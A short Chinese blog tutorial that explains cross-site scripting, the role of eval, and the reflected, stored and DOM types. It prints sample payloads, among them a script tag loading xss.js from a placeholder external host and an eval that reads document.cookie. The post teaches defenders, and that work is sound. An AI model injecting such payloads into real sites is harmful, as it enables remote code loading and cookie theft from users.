Web安全之XSS(Cross Site Scripting)深入理解
XSS的含义
XSS(Cross Site Scripting)即跨站脚本。跨站的主要内容是在脚本上。
跨站脚本
跨站脚本的跨,体现了浏览器的特性,可以跨域。所以也就给远程代码或者第三方域上的代码提供了通道。
一般弹窗攻击是无意义的。所以一般都会以脚本的形式嵌入页面。
<script src="http://www.xxx.com/xss.js"></script>
而不只是
<script>alert('XSS')</script>
多发于有输入的页面,类似表单等。
eval扮演的角色
有时候eval在其中也扮演了重要角色,因为它能解释执行js代码,类似一个小型的解释器。
<script>eval('console.log(document.cookie)')</script>
XSS的三种类型
反射型XSS
发出请求的时候,XSS代码出现在URL中,作为输入提交到服务器,服务器响应后在响应内容中出现这段XSS代码,最后交给浏览器解析,这个过程类似反射。
存储型XSS
与反射性的差别在于数据不会立马响应给客户端,而是会存储在诸如数据,文件中。等待下次用户查询的时候显示出来。触发攻。
DOM XSS
最后一种直接不经过服务器,直接在客户端依靠浏览器的解析来进行。例如上面的eval。
更多精彩文章请访问GitHub博客
无特殊声明的文章均为原创!
原创文章如若转载,请注明出处!http://www.cnblogs.com/zqzjs/
告诫自己即使再累,也不要忘记学习。成功没有捷径可走,只有一步接着一步走下去!
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET Core GC压缩(compact_phase)底层原理浅谈
· 现代计算机视觉入门之:什么是图片特征编码
· .NET 9 new features-C#13新的锁类型和语义
· Linux系统下SQL Server数据库镜像配置全流程详解
· 现代计算机视觉入门之:什么是视频
· 【译】我们最喜欢的2024年的 Visual Studio 新功能
· 个人数据保全计划:从印象笔记迁移到joplin
· Vue3.5常用特性整理
· 重拾 SSH:从基础到安全加固
· 为什么UNIX使用init进程启动其他进程?